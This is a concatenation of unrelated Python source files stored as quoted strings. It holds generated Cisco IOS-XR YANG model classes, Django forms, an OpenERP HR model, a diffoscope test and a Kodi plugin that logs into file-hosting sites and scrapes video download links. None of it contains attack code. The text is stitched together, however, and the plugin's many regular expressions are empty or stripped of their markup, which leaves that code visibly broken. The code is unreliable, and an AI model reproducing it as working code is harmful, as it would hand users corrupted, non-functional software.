\tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Default.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Default.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Default\'][\'meta_info\']\n\n\n class Ssl(object):\n """"""\n SSL sessions information\n \n .. attribute:: sessions\n \n \tsessions information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = XrXml.Agent.Ssl.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n sessions information\n \n .. attribute:: session\n \n \txml sessions information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n xml sessions information\n \n .. attribute:: session_id \n \n \tSession Id\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Ssl.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Ssl.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Ssl\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.default is not None and self.default._has_data():\n return True\n\n if self.ssl is not None and self.ssl._has_data():\n return True\n\n if self.tty is not None and self.tty._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'/Cisco-IOS-XR-man-xml-ttyagent-oper:xr-xml\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.agent is not None and self.agent._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml\'][\'meta_info\']\n\n\n', '__author__ = \'Viktor Kerkez dummy@email.com\'\n__contact__ = dummy@email.com\'\n__date__ = \'20 April 2010\'\n__copyright__ = \'Copyright (c) 2010 Viktor Kerkez\'\n\nimport logging\nfrom django import forms\nfrom django.conf import settings\nfrom google.appengine.api import mail\n\n# perart imports\nfrom perart import models\n\nclass PerArtForm(forms.ModelForm):\n tinymce = True\n\nclass ProgramForm(PerArtForm):\n class Meta:\n model = models.Program\n exclude = [\'url\']\n\n\nclass ProjectForm(PerArtForm):\n class Meta:\n model = models.Project\n exclude = [\'url\']\n\n\nclass NewsForm(PerArtForm):\n class Meta:\n model = models.News\n exclude = [\'url\']\n\n\nclass MenuForm(PerArtForm):\n tinymce = False\n\n class Meta:\n model = models.Menu\n exclude = [\'url\']\n\n\nclass GalleryForm(PerArtForm):\n class Meta:\n model = models.Gallery\n exclude = [\'url\']\n\n\nclass NewsletterForm(forms.Form):\n name = forms.CharField(required=True)\n email = forms.EmailField(required=True)\n \n def send_email(self):\n try:\n mail.send_mail(dummy@email.com\',\n to=settings.PERART_EMAIL,\n subject=\'""%(name)s"" se prijavio za newsletter\' % self.cleaned_data,\n body=\'Ime: %(name)s\\nEmail: %(email)s\' % self.cleaned_data)\n return True\n except:\n logging.exception(\'sending message failed\')\n return False\n ', '#!/usr/bin/python\n# -*- coding: utf-8 -*-\n##############################################################################\n#\n# Pedro Arroyo M dummy@email.com\n# Copyright (C) 2015 Mall Connection().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n############################################################################## \n\n\nfrom osv import osv\nfrom osv import fields\n\nclass hr_family_responsibilities(osv.osv):\n \'\'\'\n Open ERP Model\n \'\'\'\n _name = \'hr.family.responsibilities\'\n _description = \'openerpmodel\'\n \n _columns = {\n \'name\':fields.char(\'Name\', size=64, required=True, readonly=False),\n \'type\':fields.selection([\n (\'simple\',\'simple responsibility\'),\n (\'maternal\',\'maternal responsibility\'),\n (\'invalid\',\'invalid responsibility\'),\n ], \'State\', select=True),\n \'relationship\':fields.selection([\n (\'father\',\'father\'),\n (\'son\',\'son / daughter\'),\n (\'spouse\',\'spouse\'),\n (\'Father in law\',\'Father in law / mother in law\'),\n (\'son\',\'son / daughter\'),\n (\'second\',\'second\'),\n (\'Grandfather\',\'Grandfather / Grandmother\'),\n (\'grandchild\',\'grandchild / granddaughter\'),\n (\'sister\',\'sister / brother\'),\n (\'brother in law\',\'brother in law / sister in law\'),\n ], \'Relationship\', select=True, readonly=False),\n \'vat\': fields.char(\'TIN\', size=32, help=""Tax Identification Number. Check the box if this contact is subjected to taxes. Used by the some of the legal statements.""),\n \'employee_id\': fields.many2one(\'hr.employee\', string=\'Employee\'),\n \n }\nhr_family_responsibilities()', ""# -*- coding: utf-8 -*-\n#\n# diffoscope: in-depth comparison of files, archives, and directories\n#\n# Copyright © 2018 Chris Lamb dummy@email.com\n#\n# diffoscope is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# diffoscope is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with diffoscope. If not, see .\n\nimport pytest\n\nfrom diffoscope.comparators.gnumeric import GnumericFile\n\nfrom ..utils.data import load_fixture, get_data\nfrom ..utils.tools import skip_unless_tools_exist\nfrom ..utils.nonexisting import assert_non_existing\n\ngnumeric1 = load_fixture('test1.gnumeric')\ngnumeric2 = load_fixture('test2.gnumeric')\n\n\ndef test_identification(gnumeric1):\n assert isinstance(gnumeric1, GnumericFile)\n\n\ndef test_no_differences(gnumeric1):\n difference = gnumeric1.compare(gnumeric1)\n assert difference is None\n\n\n@pytest.fixture\ndef differences(gnumeric1, gnumeric2):\n return gnumeric1.compare(gnumeric2).details\n\n\n@skip_unless_tools_exist('ssconvert')\ndef test_diff(differences):\n expected_diff = get_data('gnumeric_expected_diff')\n assert differences[0].unified_diff == expected_diff\n\n\n@skip_unless_tools_exist('ssconvert')\ndef test_compare_non_existing(monkeypatch, gnumeric1):\n assert_non_existing(monkeypatch, gnumeric1, has_null_source=False)\n"", '\'\'\'\n xfilesharing XBMC Plugin\n Copyright (C) 2013-2014 ddurdle\n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\n\n\'\'\'\n\nimport cloudservice\nimport os\nimport re\nimport urllib, urllib2\nimport cookielib\n\n\nimport xbmc, xbmcaddon, xbmcgui, xbmcplugin\n\n# global variables\nPLUGIN_NAME = \'plugin.video.cloudstream\'\nPLUGIN_URL = \'plugin://\'+PLUGIN_NAME+\'/\'\nADDON = xbmcaddon.Addon(id=PLUGIN_NAME)\n\n# helper methods\ndef log(msg, err=False):\n if err:\n xbmc.log(ADDON.getAddonInfo(\'name\') + \': \' + msg, xbmc.LOGERROR)\n else:\n xbmc.log(ADDON.getAddonInfo(\'name\') + \': \' + msg, xbmc.LOGDEBUG)\n\n\n#\n#\n#\nclass xfilesharing(cloudservice.cloudservice):\n\n\n # magic numbers\n MEDIA_TYPE_VIDEO = 1\n MEDIA_TYPE_FOLDER = 0\n\n ##\n # initialize (setting 1) username, 2) password, 3) authorization token, 4) user agent string\n ##\n def __init__(self, name, domain, user, password, auth, user_agent):\n return super(xfilesharing,self).__init__(name, domain, user, password, auth, user_agent)\n #return cloudservice.__init__(self,domain, user, password, auth, user_agent)\n\n\n\n ##\n # perform login\n ##\n def login(self):\n\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n # default User-Agent (\'Python-urllib/2.6\') will *not* work\n opener.addheaders = [(\'User-Agent\', self.user_agent)]\n\n if self.domain == \'uptostream.com\':\n self.domain = \'uptobox.com\'\n\n if \'http://\' in self.domain:\n url = self.domain\n else:\n url = \'http://\' + self.domain + \'/\'\n\n\n\n values = {\n \'op\' : \'login\',\n \'login\' : self.user,\n \'redirect\' : url,\n \'password\' : self.password\n }\n\n\n\n # try login\n try:\n response = opener.open(url,urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403:\n #login denied\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))\n log(str(e), True)\n return\n response_data = response.read()\n response.close()\n\n loginResult = False\n #validate successful login\n for r in re.finditer(\'my_account\',\n response_data, re.DOTALL):\n loginResult = True\n #validate successful login\n for r in re.finditer(\'logout\',\n response_data, re.DOTALL):\n loginResult = True\n\n if (loginResult == False):\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30017))\n log(\'login failed\', True)\n return\n\n for cookie in self.cookiejar:\n for r in re.finditer(\' ([^\\=]+)\\=([^\\s]+)\\s\',\n str(cookie), re.DOTALL):\n cookieType,cookieValue = r.groups()\n if cookieType == \'xfss\':\n self.auth = cookieValue\n if cookieType == \'xfsts\':\n self.auth = cookieValue\n\n return\n\n\n\n ##\n # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie\n # returns: list containing the header\n ##\n def getHeadersList(self,referer=\'\'):\n if ((self.auth != \'\' or self.auth != 0) and referer == \'\'):\n return { \'User-Agent\' : self.user_agent, \'Cookie\' : \'lang=english; login=\'+self.user+\'; xfsts=\'+self.auth+\'; xfss=\'+self.auth+\';\' }\n elif (self.auth != \'\' or self.auth != 0):\n return { \'User-Agent\' : self.user_agent, \'Referer\': referer, \'Cookie\' : \'lang=english; login=\'+self.user+\'; xfsts=\'+self.auth+\'; xfss=\'+self.auth+\';\' }\n else:\n return { \'User-Agent\' : self.user_agent }\n\n ##\n # return the appropriate ""headers"" for FireDrive requests that include 1) user agent, 2) authorization cookie\n # returns: URL-encoded header string\n ##\n def getHeadersEncoded(self, referer=\'\'):\n return urllib.urlencode(self.getHeadersList(referer))\n\n ##\n # retrieve a list of videos, using playback type stream\n # parameters: prompt for video quality (optional), cache type (optional)\n # returns: list of videos\n ##\n def getVideosList(self, folderID=0, cacheType=0):\n\n if \'http://\' in self.domain:\n url = self.domain\n else:\n url = \'http://\' + self.domain\n\n if \'streamcloud.eu\' in self.domain:\n\n url = url + \'/\'\n\n # retrieve all documents\n if folderID == 0:\n url = url+\'?op=my_files\'\n else:\n url = url+\'?op=my_files&fld_id=\'+folderID\n\n\n videos = {}\n if True:\n req = urllib2.Request(url, None, self.getHeadersList())\n\n # if action fails, validate login\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return\n else:\n log(str(e), True)\n return\n\n response_data = response.read()\n response.close()\n\n for r in re.finditer(\'placeholder\\=\\""(Username)\\"" id\\=i\\""(nputLoginEmail)\\"" name\\=\\""login\\""\' ,\n response_data, re.DOTALL):\n loginUsername,loginUsernameName = r.groups()\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return\n\n response_data = response.read()\n response.close()\n\n\n # parsing page for videos\n # video-entry\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n fileID,url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n # video-entry - bestream\n for r in re.finditer(\'[^\\<]+([^\\<]+)\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n # video-entry - uptobox\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n\n # streaming\n videos[fileName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=streamURL&instance=\'+self.instanceName+\'&url=\' + url, \'mediaType\' : self.MEDIA_TYPE_VIDEO}\n\n if \'realvid.net\' in self.domain:\n for r in re.finditer(\'([^\\<]+)\\s+\' ,\n response_data, re.DOTALL):\n url,fileName = r.groups()\n\n #flatten folders (no clean way of handling subfolders, so just make the root list all folders & subfolders\n #therefore, skip listing folders if we\'re not in root\n# if folderID == 0:\n # folder-entry\n # for r in re.finditer(\'([^\\<]+)\' ,\n# folderID = 0\n# for r in re.finditer(\'\' ,\n# response_data, re.DOTALL):\n# folderID,folderName = r.groups()\n\n #remove   from folderName\n# folderName = re.sub(\'\\ \\;\', \'\', folderName)\n\n # folder\n# if int(folderID) != 0:\n# videos[folderName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=folder&instance=\'+self.instanceName+\'&folderID=\' + folderID, \'mediaType\' : self.MEDIA_TYPE_FOLDER}\n# if folderID == 0:\n for r in re.finditer(\'([^\\<]+)\' ,\n response_data, re.DOTALL):\n folderID,folderName = r.groups()\n\n # folder\n if int(folderID) != 0 and folderName != \' . . \':\n videos[folderName] = {\'url\': \'plugin://plugin.video.cloudstream?mode=folder&instance=\'+self.instanceName+\'&folderID=\' + folderID, \'mediaType\' : self.MEDIA_TYPE_FOLDER}\n\n return videos\n\n\n ##\n # retrieve a video link\n # parameters: title of video, whether to prompt for quality/format (optional), cache type (optional)\n # returns: list of URLs for the video or single URL of video (if not prompting for quality)\n ##\n def getPublicLink(self,url,cacheType=0):\n\n fname = \'\'\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n opener.addheaders = [ (\'User-Agent\' , self.user_agent)]\n req = urllib2.Request(url)\n try:\n response = opener.open(req)\n except urllib2.URLError, e:\n pass\n response.close()\n url = response.url\n\n# opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar), MyHTTPErrorProcessor)\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookiejar))\n opener.addheaders = [ (\'User-Agent\' , self.user_agent), (\'Referer\', url), (\'Cookie\', \'lang=english; login=\'+self.user+\'; xfsts=\'+self.auth+\'; xfss=\'+self.auth+\';\')]\n\n req = urllib2.Request(url)\n\n\n # if action fails, validate login\n try:\n response = opener.open(req)\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = opener.open(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n else:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n for r in re.finditer(\'\\([^\\<]+)\\<\',\n response_data, re.DOTALL | re.I):\n title = r.group(1)\n if fname == \'\':\n fname = title\n\n url = response.url\n req = urllib2.Request(url)\n\n for r in re.finditer(\'name\\=\\""(code)\\"" class\\=\\""(captcha_code)\' ,\n response_data, re.DOTALL):\n loginUsername,loginUsernameName = r.groups()\n self.login()\n\n req = urllib2.Request(url, None, self.getHeadersList())\n try:\n response = urllib2.urlopen(req)\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\',\'\')\n\n response_data = response.read()\n response.close()\n\n\n if self.domain == \'vidzi.tv\':\n for r in re.finditer(\'(file)\\: \\""([^\\""]+)\\.mp4\\""\' ,response_data, re.DOTALL):\n streamType,streamURL = r.groups()\n return (streamURL + \'.mp4\', fname)\n\n confirmID = 0\n values = {}\n # fetch video title, download URL and docid for stream link\n for r in re.finditer(\'.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,usr_login,id,fname,referer = r.groups()\n values = {\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'method_free\' : \'Free Download\'\n\n }\n\n\n for r in re.finditer(\'.*?.*?.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,usr_login,id,fname,referer,hash,submit = r.groups()\n values = {\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'hash\' : hash,\n \'imhuman\' : submit\n\n }\n\n for r in re.finditer(\'.*?.*?.*?.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,usr_login,id,fname,referer,hash,inhu,submit = r.groups()\n values = {\n\n \'_vhash\' : \'i1102394cE\',\n \'gfk\' : \'i22abd2449\',\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'hash\' : hash,\n \'inhu\' : inhu,\n \'imhuman\' : submit\n\n }\n\n for r in re.finditer(\'.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,referer,submit = r.groups()\n values = {\n \'op\' : op,\n \'id\' : id,\n \'referer\' : referer,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n\n for r in re.finditer(\'.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,rand,referer,submit = r.groups()\n values = {\n \'op\' : op,\n \'id\' : id,\n \'rand\' : rand,\n \'referer\' : referer,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n for r in re.finditer(\'.*?.*? .*?.*?.*?\' ,response_data, re.DOTALL):\n ipcount,op,usr_login,id,fname,referer = r.groups()\n values = {\n \'ipcount_val\' : ipcount,\n \'op\' : op,\n \'usr_login\' : usr_login,\n \'id\' : id,\n \'fname\' : fname,\n \'referer\' : referer,\n \'method_free\' : \'Slow access\'\n }\n\n values = {}\n variable = \'op\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'usr_login\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'id\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'fname\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'referer\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n\n variable = \'hash\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'inhu\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'method_free\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'method_premium\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'rand\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'down_direct\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'file_size_real\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'imhuman\'\n for r in re.finditer(\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'gfk\'\n for r in re.finditer(\'(name): \\\'\'+variable+\'\\\', value: \\\'([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n variable = \'_vhash\'\n for r in re.finditer(\'(name): \\\'\'+variable+\'\\\', value: \\\'([^\\\']*)\\\'\' ,response_data, re.DOTALL):\n hidden,value = r.groups()\n values[variable] = value\n\n# values[\'referer\'] = \'\'\n\n for r in re.finditer(\'.*?.*?.*?.*?.*?\' ,response_data, re.DOTALL):\n op,id,rand,referer,plugins,submit = r.groups()\n\n values = {\n \'op\' : op,\n \'id\' : id,\n \'rand\' : rand,\n \'referer\' : referer,\n \'plugins_are_not_allowed\' : plugins,\n \'method_free\' : submit,\n \'download_direct\' : 1\n\n }\n\n\n\n\n# req = urllib2.Request(url, urllib.urlencode(values), self.getHeadersList(url))\n req = urllib2.Request(url)\n\n if self.domain == \'thefile.me\':\n values[\'method_free\'] = \'Free Download\'\n elif self.domain == \'sharesix.com\':\n values[\'method_free\'] = \'Free\'\n\n elif \'streamcloud.eu\' in self.domain:\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(10))\n xbmc.sleep((int(10)+1)*1000)\n\n elif self.domain == \'vidhog.com\':\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(15))\n xbmc.sleep((int(15)+1)*1000)\n\n elif self.domain == \'vidto.me\':\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(6))\n xbmc.sleep((int(6)+1)*1000)\n\n elif self.domain == \'vodlocker.com\':\n xbmcgui.Dialog().ok(ADDON.getLocalizedString(30000), ADDON.getLocalizedString(30037) + str(3))\n xbmc.sleep((int(3)+1)*1000)\n\n\n\n elif self.domain == \'hcbit.com\':\n\n try:\n# response = urllib2.urlopen(req)\n response = opener.open(req, urllib.urlencode(values))\n\n except urllib2.URLError, e:\n if e.code == 403 or e.code == 401:\n self.login()\n\n try:\n response = opener.open(req, urllib.urlencode(values))\n except urllib2.URLError, e:\n log(str(e), True)\n return (\'\', \'\')\n else:\n log(str(e), True)\n return (\'\', \'\')\n try:\n if response.info().getheader(\'Location\') != \'\':\n return (response.info().getheader(\'Location\') + \'|\' + self.getHeadersEncoded(url), fname)\n except:\n for r in re.finditer(\'\\\'(file)\\\'\\,\\\'([^\\\']+)\\\'\' ,response_data, 